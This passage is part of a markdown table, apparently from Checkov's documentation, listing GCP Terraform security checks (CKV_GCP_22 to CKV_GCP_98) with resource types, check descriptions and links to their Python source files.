[GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) | +| 1632 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) | +| 1633 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) | +| 1634 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) | +| 1635 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) | +| 1636 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) | +| 1637 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) | +| 1638 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not 
anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | +| 1639 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | +| 1640 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) | +| 1641 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 1642 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 1643 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 1644 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | 
[GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 1645 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 1646 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 1647 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 1648 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 1649 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 1650 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | 
[GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) | +| 1651 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 1652 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 1653 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 1654 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 1655 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 1656 | CKV_GCP_35 | resource | 
google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 1657 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 1658 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 1659 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 1660 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) | +| 1661 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) | +| 1662 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | 
[GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 1663 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 1664 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 1665 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 1666 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 1667 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 1668 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 1669 | CKV_GCP_41 | resource | 
google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 1670 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) | +| 1671 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) | +| 1672 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 1673 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 1674 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 1675 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles 
that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 1676 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 1677 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 1678 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 1679 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 1680 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 1681 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | 
[GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 1682 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 1683 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 1684 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) | +| 1685 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) | +| 1686 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) | +| 1687 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | 
[GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) | +| 1688 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) | +| 1689 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) | +| 1690 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) | +| 1691 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) | +| 1692 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) | +| 1693 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | 
[GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) | +| 1694 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) | +| 1695 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) | +| 1696 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) | +| 1697 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) | +| 1698 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) | +| 1699 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) | +| 1700 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | 
[GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) | +| 1701 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 1702 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 1703 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 1704 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 1705 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) | +| 1706 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) | +| 1707 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | 
[GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) |
+| 1708 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) |
+| 1709 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) |
+| 1710 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) |
+| 1711 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) |
+| 1712 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) |
+| 1713 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) |
+| 1714 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) |
+| 1715 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) |
+| 1716 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) |
+| 1717 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) |
+| 1718 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) |
+| 1719 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) |
+| 1720 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) |
+| 1721 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) |
+| 1722 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) |
+| 1723 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) |
+| 1724 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) |
+| 1725 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) |
+| 1726 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) |
+| 1727 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) |
+| 1728 | CKV_GCP_92 | resource | google_vertex_ai_dataset | Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) |
+| 1729 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) |
+| 1730 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) |
+| 1731 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) |
+| 1732 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) |
+| 1733 | CKV_GCP_97 | resource | google_redis_instance | Ensure Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) |
+| 1734 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) |
